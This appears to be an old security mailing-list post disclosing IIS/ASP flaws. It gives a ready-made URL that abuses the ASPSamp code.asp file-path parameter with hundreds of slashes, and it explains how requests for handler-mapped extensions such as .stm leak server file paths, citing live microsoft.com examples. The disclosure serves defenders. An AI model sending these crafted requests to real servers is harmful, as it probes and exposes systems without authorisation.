IIS/ASP bugs

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: Tim Newsham: "Re: DoS attack: apache (& other) .htaccess Authentication"
• Previous message: Aleph One: "Administratrivia"

http://ieak.microsoft.com/ASPSamp/Samples/code.asp?source=/ASPSamp///////Samples/hello.asp

* replace //////// with a few hundred forward slashes

Looks like any IIS server with ASPSamp directory installed is
vulnerable..
(or ASPs that take file paths as input)

And something else... I notice handler mapped file extensions
reveal system file paths for web directories..
ie: try (.idq, .idc, .stm, .pl, .cgi) depending on what is mapped.

example : http://www.microsoft.com/badidea.stm

Returns "Error processing SSI file 'd:\http\badidea.stm'"

____________________________________________________________________
Dave Edis http://www.edis.org/

• Next message: Tim Newsham: "Re: DoS attack: apache (& other) .htaccess Authentication"
• Previous message: Aleph One: "Administratrivia"